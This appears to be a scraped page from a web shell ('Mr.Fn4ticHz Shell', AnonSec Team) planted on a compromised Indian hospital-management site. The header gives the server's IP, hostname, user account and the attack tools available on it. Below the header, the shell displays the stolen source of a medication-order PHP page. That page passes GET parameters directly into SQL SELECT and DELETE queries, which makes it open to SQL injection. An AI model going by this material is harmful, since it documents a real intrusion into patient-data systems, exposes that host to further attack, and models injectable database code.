Mr.Fn4ticHz Shell

Server IP : 162.240.98.243 / Your IP : 3.145.50.222
Web Server : Apache
System : Linux server.bti.yaw.mybluehostin.me 3.10.0-1160.119.1.el7.x86_64 #1 SMP Tue Jun 4 14:43:51 UTC 2024 x86_64
User : btiyawmy ( 1003)
PHP Version : 7.2.34
Disable Function : NONE
MySQL : OFF | cURL : ON | WGET : ON | Perl : ON | Python : ON | Sudo : ON | Pkexec : ON
Directory : /home/btiyawmy/www/login.easenup.in/
Upload File :
[ HOME ]
Current File : /home/btiyawmy/www/login.easenup.in/showmedicine.php
<?php
include("dbconnection.php");
require_once('../DBManager.php');
require_once('../patientmanager.php');
include("header.php");
include("dashboarddocument.php");
?>

<?php
include("dbconnection.php");
if(isset($_GET[delid]))
{
	$sql ="DELETE FROM medicinede WHERE id='$_GET[delid]'";
	$qsql=mysqli_query($con,$sql);
	if(mysqli_affected_rows($con) == 1)
	{
		echo "<script>alert('Deleted successfully..');</script>";
	}
}
?>

<!DOCTYPE html>
<html>  <head>
    
  
  </head>
  <body>
    <title>In House Patient</title>
 
  <body>
      <?php

include 'fileheader.php';
?>
         <br>  	<h3 style="text-align:center;"> Medication Order</h3>
          	<style>
    form{
        margin: 20px 0;
    }
    form input, button{
        padding: 5px;
    }
    table{
        width: 100%;
        margin-bottom: 20px;
		border-collapse: collapse;
    }
    table, th, td{
        border: 1px solid #cdcdcd;
    }
    table th, table td{
        padding: 10px;
        text-align: left;
    }
	<style>
           
			table{
    border: solid 1px gray;
    width: 100%;
  }
  
  
  </style>
  </head>
      
     <div class="">
    <!-- Content Header (Page header) -->
    <section class="">
     
<!--<input type="search" class="light-table-filter" data-table="order-table" placeholder="Search">-->
    <div id="container">
 <table border="1" class="order-table">
      <tbody>
                  <tr>
          <th>Date – time </th>
          <th>Medication Details</th>
             <th>Quantity</th>
        
         </tr>
        </tbody>
<?php
include("dbconnection.php");
require_once('../DBManager.php');
require_once('../LoginManager.php');
$narayan=LoginManager::currentUser();
$usertype=LoginManager::getUserTypeByuname("$narayan");
 $sql6 ="SELECT * FROM medicinede WHERE prescriptionid='$_GET[prescriptionid]'";
		$qsql6 = mysqli_query($con,$sql6);
		while($re1 = mysqli_fetch_array($qsql6))
		{
	$sql1 ="SELECT * FROM site_users WHERE userno='$re1[entered_by]'";
		$qsql1 = mysqli_query($con,$sql1);
		while($re = mysqli_fetch_array($qsql1))
		{
		      $sql3=$con->query("SELECT * FROM `medicine_stok` where medicine_id='$re1[DRUGS]'");
		  while($rms=$sql3->fetch_assoc()){
		  
		        if($rms['Category']=='Injectable'){
		          $z=1;
		        }
		        if($rms['Category']=='IV Fluid'){
		           $z=1;
		        }
		        if($rms['Category']=='Capsule'){
		            $x=1; $y=$re1[duration]; $w=$re1[Frequency]; 
		            $a=$x*$y;
		            $z=$a*$w;
		        }
		        if($rms['Category']=='Tablet'){
		            $x=1; $y=$re1[duration]; $w=$re1[Frequency]; 
		            $a=$x*$y;
		            $z=$a*$w;
		        }
		        if($rms['Category']=='Syrup'){
		           $z=1;
		        }
		        if($rms['Category']=='Powder'){
		           $z=1;
		        }
		        if($rms['Category']=='Ointment'){
		           $z=1;
		        }
		        
		        if($rms['Category']=='Drop'){
		           $z=1;
		        }
		         
		        if($rms['Category']=='Solution'){
		            $z=1;
		        }
		        
		        if($rms['Category']=='Patch'){
		           $z=1;
		        }
		  }  
		    
		  //   $y=$re1[duration]; $w=$re1[Frequency]; 
		  //$a=$x*$y;
		  //$z=$y*$w;
		     echo " <tbody>
            <tr>
     <td><b>Created at:</b> $re1[created_at]
                 <br><b>Created By:</b> $re[name] </td>
                 <td><b>Name :</b> 
                 ";if (is_numeric($re1[DRUGS]))
{
$sql1 ="SELECT * FROM medicine_stok WHERE medicine_id='$re1[DRUGS]'";
$qsql1 = mysqli_query($con,$sql1);
while($rs1 = mysqli_fetch_array($qsql1))
echo"$rs1[DRUGS_name]";
}
else
{
    echo"$re1[DRUGS]";
    }
    echo "  <br><b>Dose :</b> $re1[Dose] </td><td>$z</td>
    
    
    </tr>   
    
                 
          </form>
   
   	";	
		    
		}
		}
		?>

   <table id="example2"  id ="demo" class="table table-bordered table-hover">
<?php
			$sql ="SELECT * FROM addaspatient WHERE prescriptionid='$_GET[prescriptionid]' AND patientid='$_GET[patientid]'";
		$qsql = mysqli_query($con,$sql);
		if($rs = mysqli_fetch_array($qsql))
		{
            echo " <tbody>
                    
          
     ";
}
?>  
   </tbody>
</table> 
            <script>
      let modalBtns = [...document.querySelectorAll(".button")];
      modalBtns.forEach(function(btn) {
        btn.onclick = function() {
          let modal = btn.getAttribute('data-modal');
          document.getElementById(modal)
            .style.display = "block";
        }
      });
      let closeBtns = [...document.querySelectorAll(".close")];
      closeBtns.forEach(function(btn) {
        btn.onclick = function() {
          let modal = btn.closest('.modal');
          modal.style.display = "none";
        }
      });
      window.onclick = function(event) {
        if(event.target.className === "modal") {
          event.target.style.display = "none";
        }
      }
    </script>
    <script>
 function drugload(drid)
{
	    if (window.XMLHttpRequest) {
            // code for IE7+, Firefox, Chrome, Opera, Safari
            xmlhttp = new XMLHttpRequest();
        } else {
            // code for IE6, IE5
            xmlhttp = new ActiveXObject("Microsoft.XMLHTTP");
        }
        xmlhttp.onreadystatechange = function() {
            if (this.readyState == 4 && this.status == 200) {
                document.getElementById("divdr").innerHTML = this.responseText;
            }
        };
        xmlhttp.open("GET","loaddrug.php?drid="+drid,true);
        xmlhttp.send();
}
            
     
</script>
  </body>
</html>
Anon7 - 2022
AnonSec Team